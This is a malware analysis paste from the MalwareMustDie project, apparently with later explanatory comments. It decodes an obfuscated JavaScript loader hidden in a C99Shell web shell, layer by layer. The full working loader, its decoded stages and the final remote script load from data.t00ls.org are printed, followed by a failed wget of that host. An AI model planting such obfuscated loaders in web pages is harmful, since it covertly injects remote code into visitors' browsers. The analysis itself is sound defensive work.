MalwareMustDie

#MalwareMustDie - C99Shell with JS/Obfuscation to hide tools

Nov 6th, 2012
  1. =======================================
  2. #MalwareMustDie - C99Shell with the
  3. Special JavaScript Tools Download
  4. Lead to: data.t00ls.org
  5. Special thanks to @genuix for the #Hint
  6. Original Paste of C99 Code at: http://pastebin.com/raw.php?i=np17Zydg
  7. ======================================
  8. // Most of the strings already cracked by @genuix
  9. // others are the bitmaps decoded in base64
  10. // BUT!!!!!!!! found something interesting...
  11. //
  12. // Found this evil script.....
  13. // you'll be happy to see these :-)))
  14.  
  15. <script type="text/javascript" language="javascript">
  16. <!--
  // Stage 0 of the loader documented in this paste; the three decoded stages are
  // shown further down. fF7eSD8 is filled with 249 percent-encoded fragments
  // (indices 0-248). In this sample no %XX escape is split across a fragment
  // boundary, which is what lets the loop below unescape each element on its own
  // and still produce the same text as decoding the joined string.
  // Writing the decoded fragments in order assembles a second <script> of the
  // form document.write(unescape("...")): the double-encoded %25xx sequences
  // survive this first pass as %xx for that inner unescape, whose output is the
  // "first crack" script below.
  17. fF7eSD8=new Array();
  18. fF7eSD8[0]="%3Cscript%3E%0Adocu";
  19. fF7eSD8[1]="ment.write%28une";
  20. fF7eSD8[2]="scape%28%22%253Cscri";
  21. fF7eSD8[3]="pt%2520type%253D%25";
  22. fF7eSD8[4]="22text/javascr";
  23. fF7eSD8[5]="ipt%2522%253Edo";
  24. fF7eSD8[6]="cument.write%25";
  25. fF7eSD8[7]="28%2527%255Cu00";
  26. fF7eSD8[8]="3c%255Cu0073%255C";
  27. fF7eSD8[9]="u0063%255Cu0072";
  28. fF7eSD8[10]="%255Cu0069%255Cu";
  29. fF7eSD8[11]="0070%255Cu007";
  30. fF7eSD8[12]="4%255Cu0020%255C";
  31. fF7eSD8[13]="u0074%255Cu007";
  32. fF7eSD8[14]="9%255Cu0070%255Cu";
  33. fF7eSD8[15]="0065%255Cu003d%25";
  34. fF7eSD8[16]="5Cu0022%255Cu0";
  35. fF7eSD8[17]="074%255Cu0065%255C";
  36. fF7eSD8[18]="u0078%255Cu0074%25";
  37. fF7eSD8[19]="5Cu002f%255Cu";
  38. fF7eSD8[20]="006a%255Cu0061%255";
  39. fF7eSD8[21]="Cu0076%255Cu0";
  40. fF7eSD8[22]="061%255Cu0073%25";
  41. fF7eSD8[23]="5Cu0063%255Cu00";
  42. fF7eSD8[24]="72%255Cu0069%25";
  43. fF7eSD8[25]="5Cu0070%255Cu";
  44. fF7eSD8[26]="0074%255Cu0022";
  45. fF7eSD8[27]="%255Cu003e%255C";
  46. fF7eSD8[28]="u0064%255Cu00";
  47. fF7eSD8[29]="6f%255Cu0063%255C";
  48. fF7eSD8[30]="u0075%255Cu006";
  49. fF7eSD8[31]="d%255Cu0065%255Cu";
  50. fF7eSD8[32]="006e%255Cu0074%255";
  51. fF7eSD8[33]="Cu002e%255Cu00";
  52. fF7eSD8[34]="77%255Cu0072%25";
  53. fF7eSD8[35]="5Cu0069%255Cu";
  54. fF7eSD8[36]="0074%255Cu0065%25";
  55. fF7eSD8[37]="5Cu0028%255Cu002";
  56. fF7eSD8[38]="7%255Cu005c%255Cu";
  57. fF7eSD8[39]="0075%255Cu0030";
  58. fF7eSD8[40]="%255Cu0030%255Cu0";
  59. fF7eSD8[41]="033%255Cu0063%25";
  60. fF7eSD8[42]="5Cu005c%255Cu007";
  61. fF7eSD8[43]="5%255Cu0030%255Cu";
  62. fF7eSD8[44]="0030%255Cu0035";
  63. fF7eSD8[45]="%255Cu0033%255C";
  64. fF7eSD8[46]="u005c%255Cu0075";
  65. fF7eSD8[47]="%255Cu0030%255Cu";
  66. fF7eSD8[48]="0030%255Cu003";
  67. fF7eSD8[49]="4%255Cu0033%255";
  68. fF7eSD8[50]="Cu005c%255Cu007";
  69. fF7eSD8[51]="5%255Cu0030%255Cu";
  70. fF7eSD8[52]="0030%255Cu0035%255";
  71. fF7eSD8[53]="Cu0032%255Cu00";
  72. fF7eSD8[54]="5c%255Cu0075%255C";
  73. fF7eSD8[55]="u0030%255Cu0030%25";
  74. fF7eSD8[56]="5Cu0034%255Cu00";
  75. fF7eSD8[57]="39%255Cu005c%255Cu";
  76. fF7eSD8[58]="0075%255Cu0030%255";
  77. fF7eSD8[59]="Cu0030%255Cu003";
  78. fF7eSD8[60]="5%255Cu0030%255C";
  79. fF7eSD8[61]="u005c%255Cu0075";
  80. fF7eSD8[62]="%255Cu0030%255Cu00";
  81. fF7eSD8[63]="30%255Cu0035%255";
  82. fF7eSD8[64]="Cu0034%255Cu005";
  83. fF7eSD8[65]="c%255Cu0075%255C";
  84. fF7eSD8[66]="u0030%255Cu0030%25";
  85. fF7eSD8[67]="5Cu0032%255Cu";
  86. fF7eSD8[68]="0030%255Cu005c%25";
  87. fF7eSD8[69]="5Cu0075%255Cu00";
  88. fF7eSD8[70]="30%255Cu0030%255";
  89. fF7eSD8[71]="Cu0035%255Cu003";
  90. fF7eSD8[72]="3%255Cu005c%255Cu0";
  91. fF7eSD8[73]="075%255Cu0030";
  92. fF7eSD8[74]="%255Cu0030%255Cu00";
  93. fF7eSD8[75]="35%255Cu0032%25";
  94. fF7eSD8[76]="5Cu005c%255Cu00";
  95. fF7eSD8[77]="75%255Cu0030%255Cu";
  96. fF7eSD8[78]="0030%255Cu003";
  97. fF7eSD8[79]="4%255Cu0033%255Cu";
  98. fF7eSD8[80]="005c%255Cu0075%25";
  99. fF7eSD8[81]="5Cu0030%255Cu";
  100. fF7eSD8[82]="0030%255Cu0033";
  101. fF7eSD8[83]="%255Cu0064%255Cu0";
  102. fF7eSD8[84]="05c%255Cu0075%25";
  103. fF7eSD8[85]="5Cu0030%255Cu003";
  104. fF7eSD8[86]="0%255Cu0036%255";
  105. fF7eSD8[87]="Cu0038%255Cu0";
  106. fF7eSD8[88]="05c%255Cu0075%255C";
  107. fF7eSD8[89]="u0030%255Cu003";
  108. fF7eSD8[90]="0%255Cu0037%255C";
  109. fF7eSD8[91]="u0034%255Cu005c%25";
  110. fF7eSD8[92]="5Cu0075%255Cu";
  111. fF7eSD8[93]="0030%255Cu0030";
  112. fF7eSD8[94]="%255Cu0037%255Cu";
  113. fF7eSD8[95]="0034%255Cu005c%25";
  114. fF7eSD8[96]="5Cu0075%255Cu00";
  115. fF7eSD8[97]="30%255Cu0030%255Cu";
  116. fF7eSD8[98]="0037%255Cu0030%255";
  117. fF7eSD8[99]="Cu005c%255Cu00";
  118. fF7eSD8[100]="75%255Cu0030%255";
  119. fF7eSD8[101]="Cu0030%255Cu00";
  120. fF7eSD8[102]="33%255Cu0061%255Cu";
  121. fF7eSD8[103]="005c%255Cu0075";
  122. fF7eSD8[104]="%255Cu0030%255C";
  123. fF7eSD8[105]="u0030%255Cu0032%25";
  124. fF7eSD8[106]="5Cu0066%255Cu00";
  125. fF7eSD8[107]="5c%255Cu0075%255Cu";
  126. fF7eSD8[108]="0030%255Cu0030%25";
  127. fF7eSD8[109]="5Cu0032%255Cu0";
  128. fF7eSD8[110]="066%255Cu005c";
  129. fF7eSD8[111]="%255Cu0075%255Cu";
  130. fF7eSD8[112]="0030%255Cu0030%25";
  131. fF7eSD8[113]="5Cu0036%255Cu003";
  132. fF7eSD8[114]="4%255Cu005c%255C";
  133. fF7eSD8[115]="u0075%255Cu003";
  134. fF7eSD8[116]="0%255Cu0030%255C";
  135. fF7eSD8[117]="u0036%255Cu00";
  136. fF7eSD8[118]="31%255Cu005c%255";
  137. fF7eSD8[119]="Cu0075%255Cu00";
  138. fF7eSD8[120]="30%255Cu0030%255Cu";
  139. fF7eSD8[121]="0037%255Cu0034";
  140. fF7eSD8[122]="%255Cu005c%255Cu00";
  141. fF7eSD8[123]="75%255Cu0030%255C";
  142. fF7eSD8[124]="u0030%255Cu003";
  143. fF7eSD8[125]="6%255Cu0031%255";
  144. fF7eSD8[126]="Cu005c%255Cu007";
  145. fF7eSD8[127]="5%255Cu0030%255";
  146. fF7eSD8[128]="Cu0030%255Cu0";
  147. fF7eSD8[129]="032%255Cu0065";
  148. fF7eSD8[130]="%255Cu005c%255C";
  149. fF7eSD8[131]="u0075%255Cu0030%25";
  150. fF7eSD8[132]="5Cu0030%255Cu003";
  151. fF7eSD8[133]="7%255Cu0034%255Cu0";
  152. fF7eSD8[134]="05c%255Cu0075%255C";
  153. fF7eSD8[135]="u0030%255Cu00";
  154. fF7eSD8[136]="30%255Cu0033%255C";
  155. fF7eSD8[137]="u0030%255Cu005";
  156. fF7eSD8[138]="c%255Cu0075%255Cu";
  157. fF7eSD8[139]="0030%255Cu003";
  158. fF7eSD8[140]="0%255Cu0033%255C";
  159. fF7eSD8[141]="u0030%255Cu005";
  160. fF7eSD8[142]="c%255Cu0075%255";
  161. fF7eSD8[143]="Cu0030%255Cu0";
  162. fF7eSD8[144]="030%255Cu0036%255C";
  163. fF7eSD8[145]="u0063%255Cu005c";
  164. fF7eSD8[146]="%255Cu0075%255C";
  165. fF7eSD8[147]="u0030%255Cu00";
  166. fF7eSD8[148]="30%255Cu0037%25";
  167. fF7eSD8[149]="5Cu0033%255Cu00";
  168. fF7eSD8[150]="5c%255Cu0075%255";
  169. fF7eSD8[151]="Cu0030%255Cu00";
  170. fF7eSD8[152]="30%255Cu0032%255";
  171. fF7eSD8[153]="Cu0065%255Cu005c";
  172. fF7eSD8[154]="%255Cu0075%255C";
  173. fF7eSD8[155]="u0030%255Cu00";
  174. fF7eSD8[156]="30%255Cu0036%255Cu";
  175. fF7eSD8[157]="0066%255Cu005c%255";
  176. fF7eSD8[158]="Cu0075%255Cu00";
  177. fF7eSD8[159]="30%255Cu0030%255Cu";
  178. fF7eSD8[160]="0037%255Cu0032%25";
  179. fF7eSD8[161]="5Cu005c%255Cu007";
  180. fF7eSD8[162]="5%255Cu0030%255C";
  181. fF7eSD8[163]="u0030%255Cu0036%25";
  182. fF7eSD8[164]="5Cu0037%255Cu00";
  183. fF7eSD8[165]="5c%255Cu0075%255";
  184. fF7eSD8[166]="Cu0030%255Cu0030";
  185. fF7eSD8[167]="%255Cu0032%255Cu00";
  186. fF7eSD8[168]="66%255Cu005c%255";
  187. fF7eSD8[169]="Cu0075%255Cu0";
  188. fF7eSD8[170]="030%255Cu0030%255C";
  189. fF7eSD8[171]="u0037%255Cu0037";
  190. fF7eSD8[172]="%255Cu005c%255Cu";
  191. fF7eSD8[173]="0075%255Cu0030%25";
  192. fF7eSD8[174]="5Cu0030%255Cu";
  193. fF7eSD8[175]="0036%255Cu0038%255";
  194. fF7eSD8[176]="Cu005c%255Cu007";
  195. fF7eSD8[177]="5%255Cu0030%255";
  196. fF7eSD8[178]="Cu0030%255Cu0036";
  197. fF7eSD8[179]="%255Cu0035%255Cu00";
  198. fF7eSD8[180]="5c%255Cu0075%255Cu";
  199. fF7eSD8[181]="0030%255Cu003";
  200. fF7eSD8[182]="0%255Cu0037%255C";
  201. fF7eSD8[183]="u0032%255Cu00";
  202. fF7eSD8[184]="5c%255Cu0075%255";
  203. fF7eSD8[185]="Cu0030%255Cu0";
  204. fF7eSD8[186]="030%255Cu0036%25";
  205. fF7eSD8[187]="5Cu0035%255Cu0";
  206. fF7eSD8[188]="05c%255Cu0075";
  207. fF7eSD8[189]="%255Cu0030%255Cu0";
  208. fF7eSD8[190]="030%255Cu0032";
  209. fF7eSD8[191]="%255Cu0065%255Cu";
  210. fF7eSD8[192]="005c%255Cu0075";
  211. fF7eSD8[193]="%255Cu0030%255Cu00";
  212. fF7eSD8[194]="30%255Cu0036%25";
  213. fF7eSD8[195]="5Cu0061%255Cu";
  214. fF7eSD8[196]="005c%255Cu007";
  215. fF7eSD8[197]="5%255Cu0030%255";
  216. fF7eSD8[198]="Cu0030%255Cu0037";
  217. fF7eSD8[199]="%255Cu0033%255Cu0";
  218. fF7eSD8[200]="05c%255Cu0075%255C";
  219. fF7eSD8[201]="u0030%255Cu00";
  220. fF7eSD8[202]="30%255Cu0033%255Cu";
  221. fF7eSD8[203]="0065%255Cu005";
  222. fF7eSD8[204]="c%255Cu0075%255Cu";
  223. fF7eSD8[205]="0030%255Cu0030%25";
  224. fF7eSD8[206]="5Cu0033%255Cu00";
  225. fF7eSD8[207]="63%255Cu005c%255C";
  226. fF7eSD8[208]="u0075%255Cu0030";
  227. fF7eSD8[209]="%255Cu0030%255Cu0";
  228. fF7eSD8[210]="032%255Cu0066%255";
  229. fF7eSD8[211]="Cu005c%255Cu0";
  230. fF7eSD8[212]="075%255Cu0030%25";
  231. fF7eSD8[213]="5Cu0030%255Cu";
  232. fF7eSD8[214]="0035%255Cu0033%255";
  233. fF7eSD8[215]="Cu005c%255Cu007";
  234. fF7eSD8[216]="5%255Cu0030%255Cu0";
  235. fF7eSD8[217]="030%255Cu0034%255";
  236. fF7eSD8[218]="Cu0033%255Cu00";
  237. fF7eSD8[219]="5c%255Cu0075%25";
  238. fF7eSD8[220]="5Cu0030%255Cu0";
  239. fF7eSD8[221]="030%255Cu0035";
  240. fF7eSD8[222]="%255Cu0032%255Cu0";
  241. fF7eSD8[223]="05c%255Cu0075";
  242. fF7eSD8[224]="%255Cu0030%255Cu";
  243. fF7eSD8[225]="0030%255Cu0034%25";
  244. fF7eSD8[226]="5Cu0039%255Cu0";
  245. fF7eSD8[227]="05c%255Cu0075%25";
  246. fF7eSD8[228]="5Cu0030%255Cu";
  247. fF7eSD8[229]="0030%255Cu0035%25";
  248. fF7eSD8[230]="5Cu0030%255Cu";
  249. fF7eSD8[231]="005c%255Cu0075%255";
  250. fF7eSD8[232]="Cu0030%255Cu0";
  251. fF7eSD8[233]="030%255Cu0035";
  252. fF7eSD8[234]="%255Cu0034%255Cu0";
  253. fF7eSD8[235]="05c%255Cu0075";
  254. fF7eSD8[236]="%255Cu0030%255Cu";
  255. fF7eSD8[237]="0030%255Cu0033%255";
  256. fF7eSD8[238]="Cu0065%255Cu0";
  257. fF7eSD8[239]="027%255Cu0029";
  258. fF7eSD8[240]="%255Cu003c%255C";
  259. fF7eSD8[241]="u002f%255Cu0073%25";
  260. fF7eSD8[242]="5Cu0063%255Cu007";
  261. fF7eSD8[243]="2%255Cu0069%255Cu";
  262. fF7eSD8[244]="0070%255Cu007";
  263. fF7eSD8[245]="4%255Cu003e%2527%25";
  264. fF7eSD8[246]="29%253C/script%25";
  265. fF7eSD8[247]="3E%22%29%29%3B%0A%3C/scri";
  266. fF7eSD8[248]="pt%3E";
  // Emits the decoded fragments in order so the browser parses the assembled
  // script as soon as it is written. The loop index i is never declared, so it
  // becomes an implicit global. For detection, the raw array carries little
  // signal (the variable name and fragment boundaries are arbitrary); match on
  // the decoded output instead: document.write + unescape + \u00xx runs ending
  // in an external <SCRIPT SRC=...> load, as traced in the stages below.
  // The <!-- ... // --> wrapper is the old script-hiding idiom for browsers
  // without script support; it does not change what executes here.
  267. for (i = 0; i < fF7eSD8.length; i ++)
  268. {
  269. document.write(unescape(fF7eSD8[i]))
  270. }
  271. // -->
  272. </script>
  273.  
  274. -------------------------------------------
  275.  
  276. // first crack goes like this.....
  277.  
  <!-- Stage 1: what the array loader above produces once its inner unescape has
       run. The \u00xx run decodes to <script type="text/javascript">document.write('...')
       whose string argument is itself \u-escaped; decoding that once more gives the
       stage-2 script shown below. A JS string literal cannot contain raw newlines, so
       the line breaks inside the literal were presumably inserted for display. -->
  278. <script type="text/javascript">document.write('
  279. \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003d\u0022\u0074
  280. \u0065\u0078\u0074\u002f\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022
  281. \u003e\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065
  282. \u0028\u0027\u005c\u0075\u0030\u0030\u0033\u0063\u005c\u0075\u0030\u0030\u0035\u0033\u005c
  283. \u0075\u0030\u0030\u0034\u0033\u005c\u0075\u0030\u0030\u0035\u0032\u005c\u0075\u0030\u0030
  284. \u0034\u0039\u005c\u0075\u0030\u0030\u0035\u0030\u005c\u0075\u0030\u0030\u0035\u0034\u005c
  285. \u0075\u0030\u0030\u0032\u0030\u005c\u0075\u0030\u0030\u0035\u0033\u005c\u0075\u0030\u0030
  286. \u0035\u0032\u005c\u0075\u0030\u0030\u0034\u0033\u005c\u0075\u0030\u0030\u0033\u0064\u005c
  287. \u0075\u0030\u0030\u0036\u0038\u005c\u0075\u0030\u0030\u0037\u0034\u005c\u0075\u0030\u0030
  288. \u0037\u0034\u005c\u0075\u0030\u0030\u0037\u0030\u005c\u0075\u0030\u0030\u0033\u0061\u005c
  289. \u0075\u0030\u0030\u0032\u0066\u005c\u0075\u0030\u0030\u0032\u0066\u005c\u0075\u0030\u0030
  290. \u0036\u0034\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0037\u0034\u005c
  291. \u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0032\u0065\u005c\u0075\u0030\u0030
  292. \u0037\u0034\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c
  293. \u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0037\u0033\u005c\u0075\u0030\u0030
  294. \u0032\u0065\u005c\u0075\u0030\u0030\u0036\u0066\u005c\u0075\u0030\u0030\u0037\u0032\u005c
  295. \u0075\u0030\u0030\u0036\u0037\u005c\u0075\u0030\u0030\u0032\u0066\u005c\u0075\u0030\u0030
  296. \u0037\u0037\u005c\u0075\u0030\u0030\u0036\u0038\u005c\u0075\u0030\u0030\u0036\u0035\u005c
  297. \u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030
  298. \u0032\u0065\u005c\u0075\u0030\u0030\u0036\u0061\u005c\u0075\u0030\u0030\u0037\u0033\u005c
  299. \u0075\u0030\u0030\u0033\u0065\u005c\u0075\u0030\u0030\u0033\u0063\u005c\u0075\u0030\u0030
  300. \u0032\u0066\u005c\u0075\u0030\u0030\u0035\u0033\u005c\u0075\u0030\u0030\u0034\u0033\u005c
  301. \u0075\u0030\u0030\u0035\u0032\u005c\u0075\u0030\u0030\u0034\u0039\u005c\u0075\u0030\u0030
  302. \u0035\u0030\u005c\u0075\u0030\u0030\u0035\u0034\u005c\u0075\u0030\u0030\u0033\u0065\u0027
  303. \u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')</script>
  304.  
  305. ---------------------------------------------
  306.  
  307. // second round ....and runs it again to be like this:
  308.  
  <!-- Stage 2: the string written by stage 1. Its \u00xx run decodes to the plain
       <SCRIPT SRC=http://data.t00ls.org/where.js></SCRIPT> element shown as stage 3
       below; this is the last layer of encoding before the external load. -->
  309. <script type="text/javascript">document.write('
  310. \u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074
  311. \u0070\u003a\u002f\u002f\u0064\u0061\u0074\u0061\u002e\u0074\u0030\u0030\u006c\u0073\u002e
  312. \u006f\u0072\u0067\u002f\u0077\u0068\u0065\u0072\u0065\u002e\u006a\u0073\u003e\u003c\u002f
  313. \u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
  314.  
  315. ------------------------------------------------
  316.  
  317. // third round ....Then it wrote the actual strings inside as:
  318.  
  <!-- Stage 3, the final payload: an unencrypted external script load over http
       from data.t00ls.org. The host failed to resolve when the analyst fetched it
       (wget output below), so keep the hostname and URL as an IoC for blocking
       and alerting. -->
  319. <SCRIPT SRC=http://data.t00ls.org/where.js></SCRIPT>
  320.  
  321. ↑this is where the scriptkiddies download the other hacktools..
  322. ...currently sinkholed...
  323.  
  324. --00:26:52-- http://data.t00ls.org/where.js
  325. => `where.js'
  326. Resolving data.t00ls.org... failed: Unknown host.
  327.  
  328. --------------------------------
  329. #MalwareMustDie
  330. @unixfreaxjp /malware]$ date
  331. Wed Nov 7 00:31:40 JST 2012